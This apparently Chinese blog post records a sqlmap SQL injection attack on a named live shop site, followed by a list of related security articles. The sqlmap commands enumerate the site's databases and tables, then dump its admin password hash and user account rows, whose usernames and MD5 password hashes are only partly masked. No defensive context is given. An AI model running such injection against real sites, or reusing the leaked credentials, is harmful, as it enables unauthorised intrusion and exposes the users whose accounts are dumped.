root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --dbs

 

available databases [8]:
[*] dntg
[*] dntg2
[*] dnweb
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] ultrax

 
 

root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --current-db
#当前数据库

 

current database:    'dnweb'

 

root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --current-user
#当前数据库用户
current user:    'root@localhost'

 

root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --table -D "dnweb"
#列数据库表名

 

Database: dnweb
[25 tables]
+-----------------+
| account         |
| admin_user      |
| base            |
| chajian         |
| chongzhi        |
| duihuan         |
| libao_jilu      |
| libao_list      |
| meirilibao      |
| meirilibao_jilu |
| mianfei         |
| mianfei_list    |
| money_name      |
| role_dellist    |
| roleid          |
| server          |
| shop_list       |
| shop_list_copy  |
| shop_tag        |
| tuiguang        |
| xiaofei         |
| zhuce           |
| zkfcn           |
| zkfcq           |
| zkfwp           |
+-----------------+

 
 

root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --columns -T "admin_user"
#列名

 

Database: dnweb
Table: admin_user
[2 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| admin_name | varchar(20) |
| admin_pass | varchar(32) |
+------------+-------------+

 
 

root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --dump -C "admin_name,admin_pass " -T "admin_user" -D "dnweb"
#列数据

 

Database: dnweb
Table: admin_user
[1 entry]
+------------+----------------------------------+
| admin_name | admin_pass                       |
+------------+----------------------------------+
| lok**      | a9ee8d24806ee22c2daad334****** |
+------------+----------------------------------+

 
 
 

Database: dnweb
Table: account
[20 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| createtime | datetime     |
| dlts       | int(11)      |
| email      | varchar(255) |
| gold       | int(10)      |
| id         | int(10)      |
| jifen      | int(10)      |
| lastip     | varchar(16)  |
| logintime  | datetime     |
| lxdl       | int(11)      |
| money      | int(10)      |
| money2     | int(10)      |
| name       | varchar(32)  |
| namemd5id  | varchar(32)  |
| password   | varchar(32)  |
| regip      | varchar(16)  |
| security   | varchar(32)  |
| tg         | int(10)      |
| tg2        | int(10)      |
| tingyong   | int(11)      |
| vip        | int(255)     |
+------------+--------------+

 
 
 

+-------+------------+-------------+----------------------------------+----------+
| id    | email      | name        | password                         | security |
+-------+------------+-------------+----------------------------------+----------+
| 11827 | 13350*     | a414409798  | cee4fce6eaa87581421c296cbc0d3064 | NULL     |
| 11828 | 000000     | lo***       | 670b14728ad9902aecba32e22fa4f6bd** | NULL     |
| 11829 | 8888*       | q139818572* | 4607e782c4d86fd5364d7e4508bb10d9 | NULL     |
| 11830 | 123456     | 203412594*  | cfd40caa535bb51378ab60849bb54486 | NULL     |
| 11831 | 123456789  | na101*      | e10adc3949ba59abbe56e057f20f883e | NULL     |
| 11832 | NULL       | hyt100*     | 4c49c824492864666980b012bcf17d08 | NULL     |
| 11833 | 32312*     | hehe52121*  | 0733f98f76375074a3424d5b6e8ffd68 | NULL     |
| 11834 | 123456789* | fong201*    | 2798ba5d7c1b4f6eec30c9a9cad51dca | NULL     |
| 11835 | 123456     | q50504*     | e10adc3949ba59abbe56e057f20f883e | NULL     |
| 11836 | 1*          | wf199*      | 96e79218965eb72c92a549dd5a330112 | NULL     |
+-------+------------+-------------+----------------------------------+----------+

 

某网SQL注入漏洞实战的更多相关文章

  1. 【代码审计】五指CMS_v4.1.0 copyfrom.php 页面存在SQL注入漏洞分析

      0x00 环境准备 五指CMS官网:https://www.wuzhicms.com/ 网站源码版本:五指CMS v4.1.0 UTF-8 开源版 程序源码下载:https://www.wuzhi ...

  2. 【代码审计】五指CMS_v4.1.0 后台存在SQL注入漏洞分析

      0x00 环境准备 五指CMS官网:https://www.wuzhicms.com/ 网站源码版本:五指CMS v4.1.0 UTF-8 开源版 程序源码下载:https://www.wuzhi ...

  3. 【代码审计】大米CMS_V5.5.3 SQL注入漏洞分析

      0x00 环境准备 大米CMS官网:http://www.damicms.com 网站源码版本:大米CMS_V5.5.3试用版(更新时间:2017-04-15) 程序源码下载:http://www ...

  4. 【代码审计】XIAOCMS_后台database.php页面存在SQL注入漏洞

      0x00 环境准备 XIAOCMS官网: http://www.xiaocms.com/ 网站源码版本:XiaoCms (发布时间:2014-12-29) 程序源码下载:http://www.xi ...

  5. sql注入学习笔记,什么是sql注入,如何预防sql注入,如何寻找sql注入漏洞,如何注入sql攻击 (原)

    (整篇文章废话很多,但其实是为了新手能更好的了解这个sql注入是什么,需要学习的是文章最后关于如何预防sql注入) (整篇文章废话很多,但其实是为了新手能更好的了解这个sql注入是什么,需要学习的是文 ...

  6. sqlmap检测sql注入漏洞

    sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞.它由python语言开发而成,因此运行需要安装python环境. 官网:http://sqlmap.org/ 乌 ...

  7. 【代码审计】iZhanCMS_v2.1 前台IndexController.php页面存在SQL注入 漏洞分析

      0x00 环境准备 iZhanCMS官网:http://www.izhancms.com 网站源码版本:爱站CMS(zend6.0) V2.1 程序源码下载:http://www.izhancms ...

  8. 【代码审计】iZhanCMS_v2.1 前台GoodsController.php页面存在SQL注入漏洞分析

      0x00 环境准备 iZhanCMS官网:http://www.izhancms.com 网站源码版本:爱站CMS(zend6.0) V2.1 程序源码下载:http://www.izhancms ...

  9. 【代码审计】iZhanCMS_v2.1 后台存在多个SQL注入漏洞分析

      0x00 环境准备 iZhanCMS官网:http://www.izhancms.com 网站源码版本:爱站CMS(zend6.0) V2.1 程序源码下载:http://www.izhancms ...

随机推荐

  1. Some User Can Not Execute "Ship Confirm"(Doc ID 473312.1)

    APPLIES TO: Oracle Shipping Execution - Version 11.5.10.2 and later Information in this document app ...

  2. TNS-12541: TNS: 无监听程序 TNS-12560: TNS: 协议适配器错误 TNS-00511: 无监听程序

    文章转自:http://www.luocs.com/archives/464.html 此文版权归作者 – yaogang所有,转载请注明yaogang©www.luocs.com. Luocs说:这 ...

  3. (转载)Linux 套接字编程中的 5 个隐患

    在 4.2 BSD UNIX® 操作系统中首次引入,Sockets API 现在是任何操作系统的标准特性.事实上,很难找到一种不支持 Sockets API 的现代语言.该 API 相当简单,但新的开 ...

  4. 【PHP编程之路-1】设置apache虚拟目录

    概述 设置apache虚拟目录 1.开启“虚拟目录配置文件”httpd-vhosts.conf 文件路径:\wamp\bin\apache\apache2.4.9\conf\extra\httpd-v ...

  5. js实现无刷新表单提交文件,将ajax请求转换为form请求方法

    最近在做项目的时候遇到一个需要上传文件的需求,因为ajax请求是无法上传二进制文件流的,所以只能用form表单提交,而form提交有一个问题就是会使页面刷新,本文解决了form表单提交文件时页面刷新的 ...

  6. Win7以上 32/64位系统隐藏托盘图标

    前两天有朋友找我,让帮忙写个小工具,隐藏windows的托盘图标,想想最近在家也不想做太复杂的事,也好几年没写过windows上的小工具了,就答应了.想来挺简单的事,没想到还是有点小插曲的.特地来博客 ...

  7. 查找表或其他对象在某个Server上的存在

    EXEC sp_MSforeachdb 'use ? ;  IF EXISTS(SELECT top 1 1 FROM sys.syscomments WHERE text LIKE ''%test% ...

  8. 使用Spark分析拉勾网招聘信息(一):准备工作

    本系列专属github地址:https://github.com/ios122/spark_lagou 前言 我觉得如果动笔,就应该努力地把要说的东西表达清楚.今后一段时间,尝试下系列博客文章.简单说 ...

  9. 【Android】记录反编译安卓程序步骤

    主要是为了分析一个 App 里面用到的接口,以后移植 UWP 用. 1.http://jd.benow.ca/ 下载 JD-GUI. 2.https://github.com/pxb1988/dex2 ...

  10. 【C#】线程协作式取消

    Microsoft .Net Framework 提供了一个标准的取消操作的模式.这个模式是协作式的,意味着你想取消的操作必须显示地支持取消. CLR为我们提供了两个类: System.Threadi ...